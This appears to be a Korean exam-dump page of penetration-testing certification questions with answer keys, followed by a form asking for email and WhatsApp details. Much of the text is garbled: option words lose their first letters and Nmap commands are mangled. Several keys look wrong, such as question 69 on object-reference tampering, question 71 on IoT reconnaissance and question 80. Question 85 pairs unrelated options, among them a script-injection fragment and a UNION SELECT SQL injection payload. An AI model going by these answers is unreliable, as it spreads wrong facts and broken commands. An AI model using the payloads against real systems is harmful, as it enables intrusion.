C. 용자 비밀번호 암호화
D. 패치 관리 프로그램
답변 보기
정답: A
질문 #68
모의 침투 테스터가 회사의 네트워크 경계를 평가하고 있습니다. 테스터는 방어 통제 또는 대응책에 대한 제한된 정보를 받았으며 테스트에 대한 내부 지식이 제한되어 있습니다. 다음 중 정찰 활동을 계획하기 위해 가장 먼저 해야 할 단계는 무엇인가요?
A. 넷블럭의 외부 스캔을 실행합니다
B. 사에 대한 WHOIS 및 넷블록 기록을 확인합니다
C. NS 조회 및 디그를 사용하여 외부 호스트를 확인합니다
D. 사의 넷블록에 대한 핑 스윕을 수행합니다
답변 보기
정답: B
질문 #69
모의 침투 테스트 중에 테스터는 URL의 값을 example.com/login.php?id=5에서 example.com/login.php?id=10으로 변경하여 웹 애플리케이션에 대한 액세스 권한을 얻을 수 있습니다. 다음 중 모의 침투 테스트가 익스플로잇한 취약점은 무엇인가요?
A. 명령 주입
B. 인증 실패
C. 직접 객체 참조
D. 교차 사이트 스크립팅
답변 보기
정답: B
질문 #70
침투 테스터가 대상에 대해 Nmap 검사를 수행하고 다음 결과를 수신합니다. 다음 중 테스터가 대상에서 TCP 포트 1080을 사용하여 검사 도구를 리디렉션하기 위해 사용해야 하는 것은 무엇입니까?
A. essus
B. 록시체인
C. WASP ZAP
D. mpire
답변 보기
정답: B
질문 #71
다음 중 수동 정찰을 지원하기 위해 IoT 디바이스에 대한 공급업체 및 기타 보안 관련 정보를 수집하는 데 가장 유용한 도구는 무엇인가요?
A. 쇼단
B. Nmap
C. 웹스캐브-NG
D. Nessus
답변 보기
정답: B
질문 #72
보안 엔지니어가 네트워크에서 새 서버를 발견하고 해당 호스트가 승인된 버전의 Linux와 패치된 버전의 아파치를 실행하고 있는지 확인하기 위해 호스트를 검사하려고 합니다. 다음 중 이 작업을 수행하는 명령은 무엇인가요?
A. map フ サV パ80 192
B. map ג
C. map ג"A" ג"T4" ג"p80 192
D. map 버전 80 192
답변 보기
정답: C
질문 #73
침투 테스터가 dirb 유틸리티를 사용하여 웹 서버를 스캔한 후 다음과 같은 결과를 얻었습니다.다음 중 침투 테스터에게 유용한 정보를 포함할 가능성이 가장 높은 요소는?
A. index
B. 정보
C. 정보
D. home
답변 보기
정답: B
질문 #74
모의 침투 테스터는 공격자가 물리적 접근 제어 시스템에 사용되는 특수 TCP 서비스를 통해 문을 열 수 있는 취약점을 찾고 있습니다. 이 서비스는 100개 이상의 서로 다른 호스트에 존재하므로 테스터는 평가를 자동화하고자 합니다. 식별을 위해 모의 침투 테스터는 다음을 수행해야 합니다.-전체 TCP 연결 보유-'hello' 페이로드 전송-응답 대기-16바이트보다 긴 문자열 전송다음 중 이 목표를 가장 잘 지원하는 접근 방식은 무엇입니까?
A. un nmap -Pn -sV --script vuln
B. 호스트의 TCP 포트에 대해 OpenVAS 간편 스캔을 사용합니다
C. ua 언어로 스크립트를 만들어 NSE와 함께 사용합니다
D. essus로 자격 증명 스캔을 수행합니다
답변 보기
정답: C
질문 #75
PCI DSS는 침투 테스트 프로세스의 일부로 다음 중 어느 것을 요구하나요?
A. 모의 침투 테스터는 사이버 보안 인증이 있어야 합니다
B. 네트워크는 세그먼트화되어야 합니다
C. 부를 향한 시스템만 테스트해야 합니다
D. 평가는 근무 외 시간에 수행해야 합니다
답변 보기
정답: B
질문 #76
다음 중 최종 보안 평가 보고서를 이메일로 전송할 때 전송 중 기밀을 보호하는 프로토콜 또는 기술은 무엇인가요?
A. /MIME
B. TPS
C. NSSEC
D. S2
답변 보기
정답: A
질문 #77
컨설턴트가 원격 호스트에서 열려 있는 모든 포트의 SYN 스캔을 방금 수행했으며 이제 호스트에서 실행 중인 서비스 유형을 원격으로 식별해야 합니다. 다음 중 이 작업을 수행하는 데 가장 적합한 능동적 정찰 도구는 무엇인가요?
A. cpdump
B. nort
C. map
D. etstat
E. 저
답변 보기
정답: C
질문 #78
침투 테스터가 Nmap 스캔에서 다음과 같은 결과를 받았습니다:다음 중 타깃이 실행 중일 가능성이 가장 높은 OS는 무엇인가요?
A. entOS
B. rch Linux
C. indows Server
D. buntu
답변 보기
정답: C
질문 #79
일반 IT 서버와 산업 제어 시스템을 포함하는 하이브리드 네트워크 세그먼트에서 취약성 스캐너를 실행합니다:
A. 모드버스 프로토콜의 취약점을 공개합니다
B. 제어 시스템에서 의도하지 않은 장애가 발생할 수 있습니다
C. 실제 양성 판정 비율을 감소시킬 수 있습니다
D. IP 네트워크에 서비스 거부 조건을 생성합니다
답변 보기
정답: B
질문 #80
침투 테스터가 Windows 호스트에 대한 셸 액세스 권한을 획득했으며, 나중에 실행하기 위해 특별히 제작된 바이너리를 ymic.exe 프로세스 호출 생성 함수를 사용하여 실행하려고 합니다. 다음 중 이 목적을 지원할 가능성이 가장 높은 OS 또는 파일 시스템 메커니즘은 무엇인가요?
A. 대체 데이터 스트림
B. owerShell 모듈
C. P4 스테가노그래피
D. rocMon
답변 보기
정답: D
질문 #81
회사의 최고 경영자가 보조 홈 오피스를 만들었는데 사용 중인 WiFi 서비스가 공격에 취약하다고 우려하고 있습니다. 침투 테스터를 고용하여 WiFi 라우터의 보안을 테스트하고 있는데, 다음 중 무차별 대입 공격에 가장 취약한 것은 무엇인가요?
A. PS
B. PA2-EAP
C. PA-TKIP
D. PA2-PSK
답변 보기
정답: A
질문 #82
보호되지 않은 네트워크 파일 저장소에서 침투 테스트자는 사용자 이름과 비밀번호가 일반 텍스트로 된 텍스트 파일과 직원 50명의 이름, 역할, 일련 번호 등의 데이터가 포함된 스프레드시트를 발견합니다. 테스터는 텍스트 파일의 비밀번호 중 일부가 다음과 같은 형식을 따르고 있음을 알아챕니다: <이름-일련 번호>.다음 중 테스터가 이 정보를 가지고 다음에 취할 수 있는 가장 좋은 조치는 무엇인가요?
A. 비밀번호 스프레이 테스트에 대비하여 사용자 지정 비밀번호 사전을 만드세요
B. 비밀번호를 안전하게 저장하려면 텍스트 파일 대신 비밀번호 관리자/볼트를 사용하는 것이 좋습니다
C. 든 시스템과 애플리케이션에서 비밀번호 복잡성 규칙을 구성하는 것이 좋습니다
D. 호되지 않은 파일 저장소를 침투 테스트 보고서의 발견 사항으로 문서화합니다
답변 보기
정답: D
질문 #83
침투 테스트자가 회사의 클라우드 환경에서 사용자로 로그인합니다.다음 중 테스터가 기존 사용자의 액세스 수준을 확인할 수 있는 Pacu 모듈은 무엇입니까?
A. am_enum_permissions
B. am_prive_sc_scan
C. am_backdoor_assume_role
D. am_bruteforce_perissions
답변 보기
정답: A
질문 #84
모의 침투 테스터는 웹 서버에 대한 취약점 스캔을 수행해야 합니다. 다음 중 테스터가 선택할 가능성이 가장 높은 도구는 무엇인가요?
A. map
B. ikto
C. 인과 아벨
D. thercap
답변 보기
정답: B
질문 #85
침투 테스트 중에 도메인 이름, IP 범위, 호스트 및 애플리케이션이 정의됩니다:
A. script>var adr = '
B.
C. var/www/html/index
D. 유니온 SELECT 1, 데이터베이스 (), 3 -- --
답변 보기
정답: C

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: